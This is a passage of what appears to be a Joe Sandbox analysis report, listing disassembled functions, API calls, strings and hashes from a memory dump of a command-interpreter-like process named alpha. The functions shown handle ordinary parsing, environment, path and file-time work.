                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_wcslwr
                                                                                          • String ID: [%s]
                                                                                          • API String ID: 886762496-302437576
                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                          • Instruction ID: 9042f15a118144b833df9698db9ae61da0df2573d327d81587afe38e7e8bbf11
                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                          • Instruction Fuzzy Hash: AF315932706B86AAEB25CF21E8903E967A0FB8DB89F444135DE8D8B755DF3CD2458700
                                                                                          Function 00007FF6A0E832E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E833A8: iswspace.MSVCRT(?,?,00000000,00007FF6A0E9D6EE,?,?,?,00007FF6A0E90632), ref: 00007FF6A0E833C0
                                                                                          • iswspace.MSVCRT(?,?,?,00007FF6A0E832A4), ref: 00007FF6A0E8331C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswspace
                                                                                          • String ID: off
                                                                                          • API String ID: 2389812497-733764931
                                                                                          • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                          • Instruction ID: 5f608a728c66ec4e1b158936c2bd60105e0b44701e47f8f4d1171c56dfcae718
                                                                                          • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                          • Instruction Fuzzy Hash: 89218031E0E643A2FA649B25A51127D66A0FF89B90F588034D92EC7781DF2CE448A301
                                                                                          Function 00007FF6A0E99308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                          • API String ID: 3731854180-3148396303
                                                                                          • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                          • Instruction ID: b4100da367efd42e06ae6e9ca4db64a264bb8194cd8f2287079e6eeec79ab058
                                                                                          • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                          • Instruction Fuzzy Hash: 61218B72B0B643A2EA54DF5AE4402B9A7B0BF88BC0F984135DD0EC7795DF2CE844A350
                                                                                          Function 00007FF6A0E88198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscmp
                                                                                          • String ID: *.*$????????.???
                                                                                          • API String ID: 3392835482-3870530610
                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction ID: 0b7f62fc094bc8f30599c39fc0166625dd04408525ce4c0cc3b621069cf24260
                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction Fuzzy Hash: 5611A135B25AA391E7688F26B54053973A1FB88B80F1D5031DE8D97B99DF3DE481A700
                                                                                          Function 00007FF6A0E99114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: fprintf
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 383729395-2781220306
                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                          • Instruction ID: af80de27ee59aba575011259b0c61b9427a89ae55bfcb8fe8829d70e86ab5c8c
                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                          • Instruction Fuzzy Hash: 4C11913190B643A2EA558B19E9400BAA2B1FB447F0F554332D67D833E4EF2CE885A340
                                                                                          Function 00007FF6A0E809F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswspacewcschr
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                          • API String ID: 287713880-1183017076
                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction ID: 2696317d1d78fe5c4ff2287c67e83b8cc7db43652a81909c36ae0990c28fce1e
                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction Fuzzy Hash: F0F06231A1E753E5FAA88B51F44017A66A0FF49F41F5A9171E95E83354EF3CE448E700
                                                                                          Function 00007FF6A0E804F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                          • API String ID: 1646373207-2530943252
                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                          • Instruction ID: b4680fef0a0bf5ad54f845cca5b948aeeffa19617cbc17076925ba65af1da2fb
                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                          • Instruction Fuzzy Hash: DF01C4B1E0BB47A5EA948B11A89117462A0FF59731F644736E53E827E0DE2CA585A700
                                                                                          Function 00007FF6A0E973C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                          • API String ID: 1646373207-919018592
                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                          • Instruction ID: a2e57f43a823ca3a0a14d3f9f933a825e511193cff4756efc9b5f42e2bcb9066
                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                          • Instruction Fuzzy Hash: A0F0DA72B19B92A2EA049F12F44407AAA70FF8DBD1B589535EA4E57B14CF3CD485D700
                                                                                          Function 00007FF6A0E71130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                          • String ID:
                                                                                          • API String ID: 1403193329-0
                                                                                          • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                          • Instruction ID: ef9e8c26b70dac525d2a4504607187ba90ea64991b8fa6f853c1e6b0b6bdf147
                                                                                          • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                          • Instruction Fuzzy Hash: F261CE32A0AB839AFB20CB65D8402ED37A4FB88748F544134DE5D93B9AEF38E454D700
                                                                                          Function 00007FF6A0E84878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3270668897-0
                                                                                          • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                          • Instruction ID: 57c801af657e5d6b63035319b06628ff3daebfc14f27305fe8774c6d3f1c47e8
                                                                                          • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                          • Instruction Fuzzy Hash: 4C51BF71E0E643A1FB61AF25E4201B963A1FF85B80F588071DA4E873D6DF2CE949E350
                                                                                          Function 00007FF6A0E9F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                          • String ID:
                                                                                          • API String ID: 3442494845-0
                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                          • Instruction ID: fcba8d5a9684ee25d412cd4739c0d64f513f8cfb86c2c604bbda7469ec8056d3
                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                          • Instruction Fuzzy Hash: 69319A3261ABC69AEB60CF21E8407E9B7A4FB88B85F444135EA5E87B54CF38D645C700
                                                                                          Function 00007FF6A0E88F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                          • Instruction ID: 78b715d821b8a0dcd391413ca72999e49da00721b06353e5b04abc5157fb7d42
                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                          • Instruction Fuzzy Hash: CD41A475A0EB46A5EB508B18F8903A573B4FB88745FA04136EA8EC2764DF7DE448E710
                                                                                          Function 00007FF6A0E74F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                          • String ID:
                                                                                          • API String ID: 4019809305-0
                                                                                          • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                          • Instruction ID: 29544b5eb2208e2bfe6e22aab631b84de06e1b5066247a5dd810ef9d369f6361
                                                                                          • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                          • Instruction Fuzzy Hash: 2E318632A0A787A6EB904B249844378E7A1FF4ABA1F149238DD4DC7BD5CF7CD854A700
                                                                                          Function 00007FF6A0E88470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcstol$lstrcmp
                                                                                          • String ID:
                                                                                          • API String ID: 3515581199-0
                                                                                          • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                          • Instruction ID: 9bdb8dab74219af69268e8f6607a2f799463a5b45ef0c4b76555a8a807bcab10
                                                                                          • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                          • Instruction Fuzzy Hash: 8C21B432A0A68393E7644B79A69413AABA0FF8D791F155134DF4F82754CF6CE849A700
                                                                                          Function 00007FF6A0E9E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 2448200120-0
                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                          • Instruction ID: be1622fa90c2f6c5b2d257d7232d1add761b2d0f130b64789bf0945b5f55da2e
                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                          • Instruction Fuzzy Hash: 7D214F32E0A747A7E7689B11A850279B6A1FF89B91F584139EA0D83795CF3CE441AB40
                                                                                          Function 00007FF6A0EA1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 1029679093-0
                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                          • Instruction ID: 5f47b3e35084a87cc738090de50eb8e3784ba90465276f601609d517a15f6743
